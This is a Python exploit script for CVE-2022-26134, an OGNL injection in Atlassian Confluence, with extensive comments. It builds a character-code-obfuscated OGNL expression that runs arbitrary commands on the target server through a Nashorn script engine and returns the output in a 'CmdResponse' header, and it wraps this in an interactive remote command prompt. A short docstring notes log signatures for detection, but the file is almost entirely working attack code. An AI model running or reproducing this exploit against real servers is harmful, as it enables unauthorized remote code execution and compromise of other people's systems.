#!/usr/bin/env python3
import argparse
import cmd
import requests
import sys
import urllib.parse
import urllib3
# Suppress urllib3's InsecureRequestWarning. get_res() calls requests.get()
# with verify=False, so the server's TLS certificate is never validated and
# this warning would otherwise be emitted for HTTPS requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from base64 import urlsafe_b64decode
def build_chars(command):
    """Return a JavaScript snippet as comma-separated decimal character codes.

    The snippet passes *command* to ``java.lang.Runtime.exec``, reads the
    process's standard output one byte at a time and evaluates to that output
    encoded with the URL-safe Base64 alphabet.

    *command* is inserted verbatim between single quotes; no escaping is
    applied. The numeric encoding exists so that rce() can wrap the result in
    ``String.fromCharCode(...)`` without the script text appearing literally
    in the request.
    """
    script = (
        "var s='';var pp = java.lang.Runtime.getRuntime().exec('"
        + command
        + "').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"
    )
    # One decimal code point per character, joined with commas.
    return ",".join(str(ord(ch)) for ch in script)
def rce(command):
    """Return the URL-quoted OGNL expression that get_res() puts in the path.

    The expression obtains ``ServletActionContext`` by reflection, evaluates
    the character-code script from build_chars() in a Nashorn script engine
    and writes the result into a response header named ``CmdResponse``.
    The class names are spelled as concatenated fragments in the literal.

    Detection note: after quoting, the request path carries a percent-encoded
    ``${`` expression, and a successful evaluation adds a ``CmdResponse``
    header to the response. Both are usable signatures in proxy and web
    server logs.
    """
    # The two literals below are the fixed text before and after the
    # generated character codes; they must stay byte-identical.
    head = '${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode('
    tail = '))"))}'
    expression = head + build_chars(command) + tail
    return urllib.parse.quote(expression)
def get_res(base_url, command):
    """Send one GET request carrying the rce() expression and return its output.

    The expression is placed as a path segment under *base_url*. Redirects are
    not followed and TLS certificate verification is disabled
    (``verify=False``). No timeout is passed to ``requests.get``.

    Returns the Base64-decoded text of the ``CmdResponse`` response header,
    or an empty string when the header is absent. An absent header is the only
    failure signal; HTTP status codes are not inspected.
    """
    payload_path = rce(command)
    response = requests.get(
        f"{base_url}/{payload_path}/",
        allow_redirects=False,
        verify=False,
    )
    # Guard clause: no header means the expression was not evaluated.
    if 'CmdResponse' not in response.headers:
        return ''
    encoded_output = response.headers['CmdResponse']
    return urlsafe_b64decode(encoded_output).decode()
class CVEShell(cmd.Cmd):
    """Line-oriented prompt that forwards each entered line to get_res().

    Every line that is not ``exit`` or ``help`` results in one HTTP request
    to ``base_url``; nothing is kept on the remote side between lines.
    """

    # Banner printed once by cmdloop(). Kept verbatim, including its
    # backslash sequences, because it is runtime output.
    intro = """
_____________ _______________ _______________ ________ ________ ________ ____________________ _____
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \\_____ \ \_____ \/ _____/_ \_____ \ / | |
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ / ____/ ______ / ____/ __ \ | | _(__ < / | |_
\ \____\ / | \ /_____/ / \ \_/ \/ \/ \ /_____/ / \ |__\ \| |/ \/ ^ /
\______ / \___/ /_______ / \_______ \_____ /\_______ \_______ \ \_______ \_____ /|___/______ /\____ |
\/ \/ \/ \/ \/ \/ \/ \/ \/ |__|
"""
    prompt = "> "
    # Class-level default; replaced per instance in __init__.
    base_url = ""

    def __init__(self, base_url):
        """Remember the scheme-and-host prefix used for every request."""
        super().__init__()
        self.base_url = base_url

    def default(self, line):
        """Pass any unrecognised input line to get_res() and print the result."""
        print(get_res(self.base_url, line))

    def do_help(self, line):
        """Print a fixed usage hint instead of cmd.Cmd's generated help."""
        print('Enter a command to run on the remote host or exit to quit')

    def do_exit(self, line):
        """Stop the command loop; cmd.Cmd exits when a handler returns True."""
        return True
def main():
    """Parse the command line and run one command or the interactive prompt.

    A positional command takes precedence over ``--interactive``. With
    neither, an error and the usage text are printed and the process exits
    with status 1. The target is built as ``<scheme>://<domain>``, using
    plain HTTP unless ``--use_https`` is given.
    """
    parser = argparse.ArgumentParser(prog='cve-2022-26134')
    parser.add_argument(
        '-i', '--interactive', action='store_true',
        help="Launch a non-persistent interactive shell",
    )
    parser.add_argument(
        '-s', '--use_https', action='store_true', help="Use https",
    )
    parser.add_argument('domain', help="Domain to inject to")
    parser.add_argument('cmd', nargs="?", help="Command to run")
    args = parser.parse_args()

    protocol = "https" if args.use_https else "http"
    base_url = f"{protocol}://{args.domain}"

    # A command given on the command line wins over interactive mode.
    if args.cmd is not None:
        print(get_res(base_url, args.cmd))
        return

    if args.interactive:
        CVEShell(base_url).cmdloop()
        return

    # Neither a command nor --interactive was supplied.
    sys.stderr.write("[-] You must provide a command or use the --interactive option to run\n\n")
    parser.print_help()
    sys.exit(1)
# Run the command-line interface only when this file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()